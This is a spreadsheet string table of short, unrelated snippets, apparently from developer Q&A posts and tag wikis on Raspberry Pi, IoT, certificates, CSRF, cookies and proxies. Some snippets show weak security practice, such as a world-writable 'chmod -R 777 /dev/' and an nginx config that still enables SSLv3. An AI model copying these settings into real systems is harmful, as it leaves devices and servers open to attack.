  <si>
    <t>It will give IPs to all devices that connect with your pi so you can communicate via ssh.</t>
  </si>
  <si>
    <t>I'm looking for a way how to re-implement the bugged part.</t>
  </si>
  <si>
    <t xml:space="preserve">
As per my knowledge there is no way to communicate with device ID.</t>
  </si>
  <si>
    <t>This is low enough to be mostly undetectable by humans.</t>
  </si>
  <si>
    <t>There is not enough memory to install all modules in intel edison.</t>
  </si>
  <si>
    <t>Not unless the device and your program are rooted.</t>
  </si>
  <si>
    <t>Verifies the certificate by using the following cmdlet.</t>
  </si>
  <si>
    <t>DISCLAIMER: i am not a cryptography expert.</t>
  </si>
  <si>
    <t>Examples include viruses, worms, spyware, keyloggers, backdoors, etc.</t>
  </si>
  <si>
    <t>those who know the password) can access or modify certain information.</t>
  </si>
  <si>
    <t>Mecab is an open-source tokenizer and morphological analyser for Japanese, implemented in C++.</t>
  </si>
  <si>
    <t>SoftHSM is software that emulates a PKCS11 Hardware Security Module for development and testing.</t>
  </si>
  <si>
    <t>DOMTokenList is always case-sensitive.</t>
  </si>
  <si>
    <t>Questions about system administration should be asked on Super User or Server Fault.</t>
  </si>
  <si>
    <t>Designed to work with jToker and ng-token-auth.</t>
  </si>
  <si>
    <t>Hyperledger Caliper is a blockchain benchmark tool for Hyperledger and some non-Hyperledger blockchain platforms.</t>
  </si>
  <si>
    <t>An anonymous method is a procedure or function that does not have a name associated with it.</t>
  </si>
  <si>
    <t>The OAuth and OAuth 2.0 logos used in the promotional images and as logos are the work of Chris Messina and are used under the terms of the Creative Commons Attribution ShareAlike 3.0 license.</t>
  </si>
  <si>
    <t>In C programming,  is a safe version of the strcat function.</t>
  </si>
  <si>
    <t>When PHP is used as an Apache module it inherits Apache's user permissions (typically those of the "nobody" user).</t>
  </si>
  <si>
    <t>The cipher's designers were David Wheeler and Roger Needham of the Cambridge Computer Laboratory, and the algorithm was presented in an unpublished technical report in 1997 (Needham and Wheeler, 1997).</t>
  </si>
  <si>
    <t xml:space="preserve"> is the Linux software RAID management tool.</t>
  </si>
  <si>
    <t>The API is documented on Hackage</t>
  </si>
  <si>
    <t>UDP (User Datagram Protocol) is an unreliable, datagram-oriented, connectionless protocol.</t>
  </si>
  <si>
    <t>Encrypt and add password protection to PDF documents.</t>
  </si>
  <si>
    <t>The firmware contained in these devices provides the control program for the device.</t>
  </si>
  <si>
    <t>Safemode: an administrative mode for maintenance.</t>
  </si>
  <si>
    <t>An example of a virus which is not a malware, but is putatively benevolent, is Fred Cohen's compression virus.</t>
  </si>
  <si>
    <t>Not every Wi-Fi device is submitted for certification to the Wi-Fi Alliance.</t>
  </si>
  <si>
    <t>And I have the badges to prove it.</t>
  </si>
  <si>
    <t>I have code stored on my raspberry pi that I would not like people to access.</t>
  </si>
  <si>
    <t>I have KOOKYE fingerprint scanner 
Device:
https://www.amazon.co.uk/gp/product/B019TPP1UK/ref=s9_simh_gw_g147_i1_r?ie=UTF8&amp;fpl=fresh&amp;pf_rd_m=A3P5ROKL5A1OLE&amp;pf_rd_s=desktop-1&amp;pf_rd_r=0SHK4RN0THZ4NGT6PR3G&amp;pf_rd_t=36701&amp;pf_rd_p=026d359a-cb34-4790-9249-ec9f152ee8e2&amp;pf_rd_i=desktop
I want to connect it to Raspberry Pi 3, but the only library available for this device is for Arduino.</t>
  </si>
  <si>
    <t xml:space="preserve">
the vid &amp; uid is licenced from arduino.cc
you have to falsh the 8u2 (16u2 in later version) chip on board.</t>
  </si>
  <si>
    <t>Databits is almost always 8, sometimes 7 if the device only handles ASCII codes.</t>
  </si>
  <si>
    <t>So theres no need of protection.</t>
  </si>
  <si>
    <t>While PuTTY opens "shell" channel with login shell and only the shell runs the command.</t>
  </si>
  <si>
    <t>Cryptographic Nonce for anti-CSRF protection</t>
  </si>
  <si>
    <t>This is a considerable security risk.</t>
  </si>
  <si>
    <t>SDP can cause corruption.</t>
  </si>
  <si>
    <t>Files have execution permissions.</t>
  </si>
  <si>
    <t>Markup Validator Checks HTML, XHTML, SVG, SMIL, and MathML documents.</t>
  </si>
  <si>
    <t>Robust: In case of invalid configurations or logging instructions,
SLF rather outputs debug warnings instead of crashing your
application at runtime.</t>
  </si>
  <si>
    <t>When you use Wsdl.exe to create a proxy class, a single source file is created in the programming language that you specify.</t>
  </si>
  <si>
    <t>Before the system becomes public, complete testing of a web-based system can help to address issues.</t>
  </si>
  <si>
    <t>:
Generally, you want to minimize the code in the lock statement.</t>
  </si>
  <si>
    <t>with  even chmod -R 777 /dev/
But still get "Permission denied" error when try to open that file like this( I'm using xcode 4.2.1 for programming):
what else I can do to get proper permission ?</t>
  </si>
  <si>
    <t>Smart IP identifies visitor's geographical location (longitude/latitude), country, region, city and postal code based on the IP address of the user.</t>
  </si>
  <si>
    <t>Having a means to update the root certificate once the IoT device is deployed effectively mitigates this risk.</t>
  </si>
  <si>
    <t>If on the other hand, your input represents a severe threat for your device (e.g.</t>
  </si>
  <si>
    <t>In order to access any of the Google APIs you must have a project to identify you.</t>
  </si>
  <si>
    <t>Is there a way to set up a raspberry pi in a sort of "kiosk" mode where only the gui of one java program is automatically started after login?</t>
  </si>
  <si>
    <t>How can I track if I encountered any errors while uploading certificate.</t>
  </si>
  <si>
    <t>So if someone potentially steals one of them, he absolutely can't access to anything.</t>
  </si>
  <si>
    <t>In such case, would the certificate be still valid while communicating with IBM Watson IOT Cloud server.</t>
  </si>
  <si>
    <t>The cause turned out to be that I had multiple certificates associated with the button.</t>
  </si>
  <si>
    <t>The edge-detection/callback code is efficient, only being invoked when an event takes place.</t>
  </si>
  <si>
    <t>They even give you a few hints about XBeeMessage information.</t>
  </si>
  <si>
    <t>The CryptProtectData function performs encryption on the data in a DATA_BLOB structure.</t>
  </si>
  <si>
    <t>I have a vague memory about not being able to access UI controls through the dataReceived event.</t>
  </si>
  <si>
    <t>You need to set some headers, to masquerade as a browser and thus pass as a human user.</t>
  </si>
  <si>
    <t>I don't really like the approach to install a webserver for the certificate only.</t>
  </si>
  <si>
    <t>Add the Button or hyper link that will be used to kick start the authentication process.</t>
  </si>
  <si>
    <t>More information can be found in OAuth section.</t>
  </si>
  <si>
    <t>This allows your Heroku app to interact with Salesforce through Postgres without having to authenticate with Salesforce or install additional software.</t>
  </si>
  <si>
    <t>Bitcoins are created as a reward for a process known as mining.</t>
  </si>
  <si>
    <t>XBRL is used most often in a use case of financial regulation.</t>
  </si>
  <si>
    <t>The Id attribute is added to identify the server control.</t>
  </si>
  <si>
    <t>My OS has two users - Admin and standard user.</t>
  </si>
  <si>
    <t>Look at  answer and then make sure you have permission to open the device.</t>
  </si>
  <si>
    <t>If i set hostapd for open\no authentication it works like a charm.</t>
  </si>
  <si>
    <t>Once you get have the device you'll wanna open BluetoothSocket with the device.</t>
  </si>
  <si>
    <t>I already have a Spyder i1 that can do this, but it's overkill and large.</t>
  </si>
  <si>
    <t>I am running a flask application on localhost which will run a servo when a password requirement is met.</t>
  </si>
  <si>
    <t>The authentication as the user demo is handled in the protocol run then.</t>
  </si>
  <si>
    <t>Imperva is a provider of cyber and data security products.</t>
  </si>
  <si>
    <t>A good walkthrough of the OAuth 1.0 specification.</t>
  </si>
  <si>
    <t>I install mosquitto on Windows and send a message with the command successfully:
Based on information you provided, maybe the issue caused by the certificate.</t>
  </si>
  <si>
    <t>It is highly recommended you switch to OpenSSL or another maintained encryption project.</t>
  </si>
  <si>
    <t>I learned about fauxmo script that can trick and have the pins of the raspberry pi to be interpreted as individual devices.</t>
  </si>
  <si>
    <t>My Setup:
bluetooth module is in slave mode
i am using insecure rfcomm to communicate with bluetooth module.</t>
  </si>
  <si>
    <t>and the code for xml part is
Please include the following permissions in the manifest  file
&lt;uses-permission android:name="android.permission.INTERNET"/&gt; 
&lt;uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /&gt;
&lt;uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /&gt;</t>
  </si>
  <si>
    <t>And it also suggested us to find additional information from Intel.</t>
  </si>
  <si>
    <t>According to this blogpost, I am trying to implement headless authentication, using an other device as described here.</t>
  </si>
  <si>
    <t>Due to the lower frequency of LoRa it will better penetrate buildings.</t>
  </si>
  <si>
    <t>Is it possible to make such protection?</t>
  </si>
  <si>
    <t>BufferSize, db URL, User, &amp; Password are configurable options in the standard log4j ways.</t>
  </si>
  <si>
    <t>On my Arduino project, I use Cryptosuite(link 3) library for hmac-sha1 and arduino-base64(link 4) library for base64encode.</t>
  </si>
  <si>
    <t>As part of diagnostic, the command: 
was used to see if the hci0 device could be opened.</t>
  </si>
  <si>
    <t>Would the pseudocode below be the best way to do that?</t>
  </si>
  <si>
    <t xml:space="preserve"> doesn't handle authentication.</t>
  </si>
  <si>
    <t>Your code is looking for any device with the ssh port 22 open.</t>
  </si>
  <si>
    <t>It handles user authentication.</t>
  </si>
  <si>
    <t>You probably want [access-violation] instead</t>
  </si>
  <si>
    <t>NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.</t>
  </si>
  <si>
    <t>You probably want access-violation instead.</t>
  </si>
  <si>
    <t>This technique is commonly used by spammers to hide the origin of their e-mails and leads to problems such as misdirected bounces.</t>
  </si>
  <si>
    <t>Manufacturers publish these sheets as there'd be no way to work with their parts if they were proprietary and secret.</t>
  </si>
  <si>
    <t>Cause: A connection to a database or other service was requested using a connect identifier, and the connect identifier specified could not be resolved into a connect descriptor using one of the naming methods configured.</t>
  </si>
  <si>
    <t>This will run and continuously return "Detected" even with the sensor completely covered.</t>
  </si>
  <si>
    <t>The problem arise when I invoke the redirect(url_for) function (including @login_required).</t>
  </si>
  <si>
    <t>If you run into problems, I'd recommend stripping your program down to just the basics - WiFi connect and then WiFiClientSecure; don't worry about the PIR sensor or anything else.</t>
  </si>
  <si>
    <t>Specifically I expect something like this pseudocode:
How can I do it?</t>
  </si>
  <si>
    <t>Open , you'll need to use sudo vim/nano/emacs because its a protected file.</t>
  </si>
  <si>
    <t>I am working on a keypad password lock system based on Arduino UNO.</t>
  </si>
  <si>
    <t>HTTP using X.509 certificate based authentication
3.</t>
  </si>
  <si>
    <t>The encryption algorithm is based on AES 128.</t>
  </si>
  <si>
    <t>You need to open terminal from the Raspberry Pi, or SSH.</t>
  </si>
  <si>
    <t>An architecture for Win32-based POS device access.</t>
  </si>
  <si>
    <t>The mode argument specifies the access mode with which the file is to be opened.</t>
  </si>
  <si>
    <t>jdbc is a Java-based data access technology () from Oracle Corporation.</t>
  </si>
  <si>
    <t>saml is a product of the oasis Security Services Technical Committee.</t>
  </si>
  <si>
    <t>Privileged in this context refers to what is known in mozilla jargon as "chrome" code, meaning platform and UI code and add-on (extension) code.</t>
  </si>
  <si>
    <t>Code
Stack Trace
System.ArgumentException:
   at Microsoft.Azure.Devices.HttpClientHelper+d__36.MoveNext (Microsoft.Azure.Devices, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35)
   at System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess (mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089)
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification (mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089)
   at Microsoft.Azure.Devices.HttpClientHelper+d__121.GetResult (mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089)
   at ProjectXXX.NTB.FN.DeviceRegistration.IdentityCreationService+d__6.MoveNext (ProjectXXX.NTB.FN.DeviceRegistration, Version=1.0.0.0, Culture=neutral, PublicKeyToken=nullProjectXXX.NTB.FN.DeviceRegistration, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null: D:\ProjectXXX\ProjectXXX.NTB\ProjectXXX.NTB\DeviceRegistrationLib\ProjectXXX.NTB.FN.DeviceRegistration\IdentityCreationService.csProjectXXX.NTB.FN.DeviceRegistration, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null: 122)</t>
  </si>
  <si>
    <t>Vulnerability/Attack</t>
  </si>
  <si>
    <t>In general, you should try to use one of the more distinct tags, like 
zend-framework or zf for questions about Zend Framework, 
zend-studio for questions about Zend's commercial IDE, 
zend-server for questions about Zend's server appliance, 
zend-guard for questions about Zend's source code obfuscator, 
zend-engine for questions about writing extensions and the inner workings of PHP.</t>
  </si>
  <si>
    <t>Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.</t>
  </si>
  <si>
    <t>If you want to have the captive portal login page appear in the captive portal authentication pop-up on the device, just redirect all HTTP requests to the login page.</t>
  </si>
  <si>
    <t>If I serve my local page from the local domain name "www.hiker-log.com", if my user eventually leaves the captive portal, connects to the web, and visits www.hiker-log.com, would they be able to access the cookies that I have stored?</t>
  </si>
  <si>
    <t>$hours = 24;
// make connection to database
$connectdb = mysqli_connect($host,$user,$password)
or die ("Cannot reach database");
// select db
mysqli_select_db($connectdb,$database)
or die ("Cannot select database");
// sql command that selects all entires from current time and X hours backward
$sql="SELECT temperature, humidity FROM temperaturedata where sensor = 'Exterior' and dateandtime &gt;= (NOW() - INTERVAL $hours HOUR) order by dateandtime desc LIMIT 1";
// set query to variable
$temperatures = mysqli_query($connectdb,$sql);
// create content to web page
?&gt;
&lt;?php
// loop all the results that were read from database and "draw" to web page
while($temperature=mysqli_fetch_assoc($temperatures))
$json=json_encode($temperature);
echo $json;
?&gt;
I wanna to display the data from the two sensors in the index.php file 
but I even with one I will feel ok</t>
  </si>
  <si>
    <t>To allow access to this website to specific users only, I have created a login form that can be seen in this link:
http://176.32.230.47/noticeboard.com/php/index.php
After successful login, it redirects to a page that looks something like this:
the mainpage which is in-turn used to access one of the Arduino web servers in the LAN 
As evident in this main-page, the buttons for the classes will be used to redirect to the Arduino web-server in that particular class.</t>
  </si>
  <si>
    <t>Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (pronounced sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.</t>
  </si>
  <si>
    <t>Official resources
PyCrypto homepage
PyCrypto alternative homepage
PyCrypto API documentation
PyCrypto PyPi page
PyCrypto GitHub repository
Installation
As the PyCrypto PyPi page suggests, an easy way to install PyCrypto is by using the following command.</t>
  </si>
  <si>
    <t>Cross Site Request Forgery also known as a one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF,  is a malicious attack to exploit a website's trust in a user's browser.</t>
  </si>
  <si>
    <t>Heres a quick list of features youll enjoy when using CakePHP:
Active, friendly Official CakePHP discussion group
Flexible licensing
Compatible with versions PHP 5.2.8 and greater
Integrated CRUD for database interaction
Application scaffolding
Code generation
MVC architecture
Request dispatcher with clean, custom URLs and routes
Built-in validation
Fast and flexible templating (PHP syntax, with helpers)
View helpers for AJAX, JavaScript, HTML forms and more
Email, cookie, security, session, and request handling Components
Flexible ACL
Data sanitization
Flexible caching
Localization
Works from any web site directory, with little to no Apache configuration involved</t>
  </si>
  <si>
    <t>Items you will need:
an SSL certificate for your domain (available for free from letsencrypt.org)
a web server on the Pi (since Motion doesnt use any installed webserver but instead has its own inbuilt one) - Id recommend Nginx or Apache
certbot (to generate/install the certificate on the pi)
configure the web server to be a reverse proxy and serve the http motion website as https using your SSL certificate
secure the website (both apache and nginx support http basic authentication which, if the reverse proxy is configured correctly, will be served over https so encrypted, which is better than unencrypted, base64 encoded (and easily decoded) credential info transmitted in the clear for all to see/intercept).</t>
  </si>
  <si>
    <t>Internet Explorer assigns all websites to one of four security zones: Internet, Local intranet, Trusted sites, or Restricted sites.</t>
  </si>
  <si>
    <t>Basic NETCONF operations have been standardized and consist of:
get
get-config
edit-config
copy-config
delete-config
lock
unlock
close-session
kill-session
validate
commit
confirmed-commit
cancel-commit
create-subscription*
get-schema*
partial-lock*
partial-unlock*
*specified in a separate RFCs
Learn more about NETCONF here:
NETCONF Wikipedia page
the specification
NETCONF wiki
NETCONF Workgroup tracker
(also the sources of most of the content on this page)</t>
  </si>
  <si>
    <t>Choose one:
From the desktop
Launch  from the Preferences menu
Navigate to the Interfaces tab
Select Enabled next to SSH
Click OK
From the terminal with raspi-config
Enter sudo raspi-config in a terminal window
Select Interfacing Options
Navigate to and select SSH
Choose Yes
Select Ok
Choose Finish
Start the SSH service with systemctl
On a headless Raspberry Pi
For headless setup, SSH can be enabled by placing a file named ssh, without any extension, onto the boot partition of the SD card.</t>
  </si>
  <si>
    <t>References
RFC 6797: HTTP Strict Transport Security (HSTS)
ForceHTTPS: Protecting High-Security Web Sites
from Network Attacks
ForceTLS Firefox Addon
Mozilla Bug 495115 - Implement Strict-Transport-Security (was ForceTLS) to allow sites to specify HTTPS-only connections
Strict Transport Security in NoScript
Forcing HTTPS with NoScript
HTTP Strict Transport Security Cheat Sheet
HTTP Strict Transport Security
Understanding HTTP Strict Transport Security (HSTS) and preloading it into the browser
RFC 7457: Summarizing Known Attacks on Transport Layer Security (TLS)and Datagram TLS (DTLS)</t>
  </si>
  <si>
    <t>Man-in-the-Browser (MITB, MitB, MIB, MiB), a form of Internet threat related to man-in-the-middle (MITM), is a proxy Trojan horse that infects a web browser by taking advantage of vulnerabilities in browser security to modify web pages, modify transaction content or insert additional transactions, all in a completely covert fashion invisible to both the user and host web application</t>
  </si>
  <si>
    <t>Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.</t>
  </si>
  <si>
    <t>Questions that are candidates for this tag:
Questions about developing web sites that work well for proxy browsers.</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Safari version 10.0 released at October 31, 2017,includes the following new functions:
Safari Extensions such as 1Password, Save to Pocket, and DuckDuckGo
New Bookmarks sidebar, including double-click to focus in on a folder
Redesigned Bookmarks and History views
Site-specific zoom: Safari remembers and re-applies your zoom level to websites
Improved AutoFill from Contacts card
Reader improvements, including in-line sub-headlines, bylines, and publish dates
Legacy plug-ins are turned off by default in favor of HTML5 versions of websites
Allow reopening of recently closed tabs through the History menu, holding the "+" button in the tab bar, and using Shift-Command-T
When a link opens in a new tab, it is now possible to hit the back button or swipe to close it and go back to the original tab
Improved ranking of Frequently Visited Sites
Web Inspector Timelines Tab
Debugging using Web Inspector
Wiki: </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://en.wikipedia.org/wiki/Safari_(web_browser)#Safari_10</t>
    </r>
  </si>
  <si>
    <t>If your question isn't directly related to programming/software dev, you should better ask it on security.stackexchange.com for general questions and on crypto.stackexchange.com for details about the cryptography behind it.</t>
  </si>
  <si>
    <t>debug1: permanently_set_uid: 0/0
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_rsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_rsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_dsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_dsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_ecdsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_ecdsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_ed25519 type -1
debug1: key_load_public: No such file or directory
debug1: identity file /root/.ssh/id_ed25519-cert type -1
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_7.4p1 Raspbian-10+deb9u1</t>
  </si>
  <si>
    <t>For example, if my intranet page's domain name matches one on the web, could someone from that website grab the cookies that were written from my website on the same domain name?</t>
  </si>
  <si>
    <t>Cross-site request forgery, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.</t>
  </si>
  <si>
    <t>Questions:
Internet Explorer ignores cookies on some domains (cannot read or set cookies)
What encryption algorithm is best for encrypting cookies?</t>
  </si>
  <si>
    <t>Selenium 1
Selenium 1, also known as Selenium RC (Remote Control), is the first version of Selenium which provided JavaScript libraries which would be injected into the browser.</t>
  </si>
  <si>
    <t>It prevents somebody watching users Internet connection from figuring out what websites they visit, and it prevents the websites they visit from learning the users physical location.</t>
  </si>
  <si>
    <t>Session cookies allow a website to keep a state or memory of the visitor as they navigate between pages of the website.</t>
  </si>
  <si>
    <t>Additional parameters:
--no-browser - suppress automatic web browser launching
--quiet - suppress logging
--open=PATH - launch browser to PATH instead of server root
--port=8081 - open with port
--proxy=http://localhost:8080 - proxy a running server
--only-exts="" - watch only files with the specified extensions
--ignore-exts="" - exclude files with the specified extensions</t>
  </si>
  <si>
    <t>EDIT: After moving System.Web.Extensions.dll from Mono's folder to the bin folder, I get this error:
System.InvalidOperationException
Assembly 'System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' does not contain a Web resource with name 'jquery'.</t>
  </si>
  <si>
    <t>Ability to upload and attach files to news
Built-in protection from unauthorized downloading of files (antileech)
Import RSS news
RSS Widgets
Multilingual support news site
Support Tag Cloud
Automatic support for smartphones
Opportunities for visitors to the site
Register online
Adding comments
Change and delete users their own comments
Ability to add news from visitors
Moderating news
statistics on the specific user (including rating and profile)
Displays various information for registered users and there is no
Ability to upload photos to user's profile
Ability to recover a forgotten password
Ability to edit the news directly on the site
Change skins on the site at its own discretion
Keeping tabs for news, and quick access to them.</t>
  </si>
  <si>
    <t>permanent;
}
server {
  listen          443 ssl;
  server_name     mine260309.me;
  ssl_certificate     /path/to/cert/cert_file;
  ssl_certificate_key /path/to/cert/cert_key_file;
  ssl_protocols       SSLv3 TLSv1 TLSv1.1 TLSv1.2;
  ssl_ciphers         HIGH:!aNULL:!MD5;
  access_log         /path/to/wordpress/logs/proxy.log;
  error_log            /path/to/wordpress/logs/proxy_error.log;
location / {
  # reverse-proxy to upstreams
  proxy_pass  http://mineservers;
  ### force timeouts if one of backend is died ##
  proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504;
  ### Set headers ####
  proxy_set_header        Accept-Encoding   "";
  proxy_set_header        Host            $host;
  proxy_set_header        X-Real-IP       $remote_addr;
  proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
  ### Most PHP, Python, Rails, Java App can use this header ###
  #proxy_set_header X-Forwarded-Proto https;##
  #This is better##
  proxy_set_header        X-Forwarded-Proto $scheme;
  add_header              Front-End-Https   on;
  ### By default we don't want to redirect it ####
  proxy_redirect     off;
  }
}
server {
  root /path/to/wordpress;
  listen          8000;
  server_name     mine260309.me;
  ... # normal wordpress configurations
}
On Ubuntu, it can use the same config file.</t>
  </si>
  <si>
    <t>Content Security Policy (CSP) is a computer security standard introduced to prevent cross-site scripting (XSS), clickjacking and other code injection attacks resulting from execution of malicious content in the trusted web page context.</t>
  </si>
  <si>
    <t>Solution 3: If you have not configured your CodeIgniter application/config/config.php file to remove $config['index_page'] = ''; then you will need to include the index.php in your URL 
Solution 4: After all settings you need to load the form url etc.. in autoload.php $autoload['helper'] = array('url', 'file','form','security');
http://www.example.com/index.php/site 
Note you will need a .htaccess file when you are removing index.php .htaccess for Codeigniter 2 &amp; 3
Frequently asked questions
How should I choose an authentication library for CodeIgniter?</t>
  </si>
  <si>
    <t>It can also used for client-side scripting in internet-explorer (not other browsers), but is generally used for this purpose only in intranet web applications, where the browser can be limited to IE.</t>
  </si>
  <si>
    <t>Web scraping (also known as web harvesting, web mining or web data extraction) is a software technique for extracting specific information from websites.</t>
  </si>
  <si>
    <t>Codeigniter sessions store a cookie for each user as serialized (and optionally encrypted) data, rather than utilize native PHP sessions.</t>
  </si>
  <si>
    <t>Some websites block certain Internet users by geography, so using a Web proxy located in the Web host's country will allow foreign users to use the website.</t>
  </si>
  <si>
    <t>Encoding functions generally take un-trusted input and translate it into a format which is suitable for inclusion in output, minimizing the risk of injection attacks such as Cross Site Scripting.</t>
  </si>
  <si>
    <t>Federated Login, based on the OpenID standard, frees users from having to set up separate login accounts for different web sites and frees web site developers from the task of implementing login authentication measures.</t>
  </si>
  <si>
    <t>Since my Companys Ethernet is behind a Proxy I added 2 Files at:
etc/apt/apt.conf.d/10proxy
etc/profile.d/proxy.sh
10proxy looks like this:
proxy.sh looks like:
With these two files in place i still cant access the Internet.</t>
  </si>
  <si>
    <t>This tag strictly relates to cryptograhy and its implementation and should not be confused with the release candidate version of software products.</t>
  </si>
  <si>
    <t>Nov 18 20:20:05 raspberrypi CRON[343]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 20:20:05 raspberrypi CRON[343]: pam_unix(cron:session): session closed for user root
Nov 18 20:20:05 raspberrypi sudo:     root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/bin/node /var/www/html/api/server.js
Nov 18 20:20:05 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by (uid=0)</t>
  </si>
  <si>
    <t>They are usually higher than normal user's privileges (for example, administrator privileges are regarded as elevated privileges).</t>
  </si>
  <si>
    <t>Official Website: http://static.springsource.org/spring-security/site/extensions/krb/
Useful Links:
Article (Spring Blog)
Documentation
API Documentation (JavaDoc)
Example
Related Tags:
spring
spring-security</t>
  </si>
  <si>
    <t>unsafeWindow bypasses Greasemonkey's XPCNativeWrapper-based security model, which exists to make sure that malicious web pages cannot alter objects in such a way as to make greasemonkey scripts (which execute with more privileges than ordinary JavaScript running in a web page) do things that their authors or users did not intend.</t>
  </si>
  <si>
    <t>Prior to HTML5, Web browsers disallowed cross-site scripting, to protect against security attacks.</t>
  </si>
  <si>
    <t>Links:
eLearning: Cross-Site Request Forgery Explained
Cross-site request forgery (CSRF) vulnerability on Nasa.gov Domains
CSRF/XSRF Online generator</t>
  </si>
  <si>
    <t>Features of "Php2Html":
Creates static HTML files from dynamic PHP urls
Verifies links reference in PHP files
Updates local web sites when updated HTML files are created
Updates remote web sites via FTP when updated HTML files are created
Sends custom e-mail alerts when PHP referenced links are invalid
Supports SMTP and username/password authentication
Supports FTP and username/password authentication
Custom monitor intervals can be configured for each domain</t>
  </si>
  <si>
    <t>Use this tag for questions related to csrf (Cross-site request forgery) that involves the generation of a token.</t>
  </si>
  <si>
    <t>Web Application Security
Web application security is a branch of Information Security that deals specifically with security of websites, web applications and web services.</t>
  </si>
  <si>
    <t>I'm having some problems though, because i have no ssh access to the webserver (and the hosting company wont give it to me because it poses security issues), i'm seeing no way to connect to the raspberry pi from the outer web (what i intended was a reverse ssh tunnel)
Also, i'm not being able to install web2py on the pi, and i was trying because it seems like such an amazing framework, but i wonder if i should install it on the webserver instead and then just serve the python to the pi or only the command to run the python on the pi itself (the scripts hosted in the pi or the web server?)</t>
  </si>
  <si>
    <t>PHP-security is for topics relating to discussions, questions and best practices of security-related implementations in PHP.</t>
  </si>
  <si>
    <t>Questions and support relating to the Titanium Web Proxy, a .NET web proxy plugin.</t>
  </si>
  <si>
    <t>This tag is for questions relating to the general topic of privileges, without reference to any specific operating system or application.</t>
  </si>
  <si>
    <t>php-security is for topics relating to discussions, questions and best practices of security-related implementations in php.</t>
  </si>
  <si>
    <t>These exceptions are often at the core of legitimate cross-domain communications (such as jsonp) as well as malicious cross-site scripting attacks.</t>
  </si>
  <si>
    <t>Brand New Add to Cart Confirmation with Cross Selling
A totally new and user-friendly Add to Cart feature displays a pop-up confirmation to customers along with related and complementary products for quick and effective cross-selling.</t>
  </si>
  <si>
    <t>Safari version 9.0 released at 30 September 2015, use this tag in addition of safari tag when you want to ask specific question related with this version.</t>
  </si>
  <si>
    <t>Safari version 11 released at September 19, 2017, use this tag in addition of safari tag when you want to ask specific question related with this version.</t>
  </si>
  <si>
    <t>is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.</t>
  </si>
  <si>
    <t>Performs as a reverse Web proxy
WebSEAL appears as a Web server to clients and appears as a Web browser to the junctioned back-end servers it is protecting.</t>
  </si>
  <si>
    <t>For example, when a web browser assumes that a web site is legitimate because the site shows a certificate signed by a certificate authority, the browser trusts the CA.</t>
  </si>
  <si>
    <t>WebSEAL normally acts as a reverse Web proxy by receiving HTTP/HTTPS requests from a Web browser and delivering content from its own Web server or from junctioned back-end Web application servers.</t>
  </si>
  <si>
    <t>The rules governing cookies are not the same as the access control rules of the DOM in JavaScript which are based on the same domain policy, but because cookie access is mostly based on domain name, they are sometimes confused with the usual HTTP same domain policy.</t>
  </si>
  <si>
    <t>Questions regarding Tableau server administration, site &amp; user management, access control and ownership of content, security, data source mgmt, data extract and refresh, admin tools &amp; pages,  licensing, server specific features like subscription and custom views, performance optimization and general server related trouble-shooting</t>
  </si>
  <si>
    <t>From a curiosity perspective, couldn't my little captive portal pretty much just spoof the domain and/or ip of any website it wanted and make off with client cookies from any website?</t>
  </si>
  <si>
    <t>: 192.168.0.5?secret=psst
or having a secret passed as a cookie (Arduino will get all cookies for the same domain/host when a browser asks for a web page - however this requires that the logon is also on the same domain, i.e.</t>
  </si>
  <si>
    <t>Safe Browsing is a service provided by Google that enables applications to check URLs against Google's constantly updated lists of suspected phishing and malware pages.</t>
  </si>
  <si>
    <t>Microsoft: Basic Security Practices for Web Applications
Mozilla Developer Network: Web security
Note that security questions which are not about a specific programming problem may be better suited to our sister site, IT Security Stack Exchange.</t>
  </si>
  <si>
    <t>Useful links
Official website
Wikipedia
Related tags
intel-galileo
intel-edison
intel-xdk</t>
  </si>
  <si>
    <t>Here are some of the things you can do with the Safe Browsing service:
Warn users before clicking on links that appear in your site when
they lead to malware-infected pages.</t>
  </si>
  <si>
    <t>An example header (taken from the Mozilla CSP documentation), which restricts JavaScript to the current domain, allows images from anywhere and restricts media files to the domain media1.com and any subdomain of media2.com:
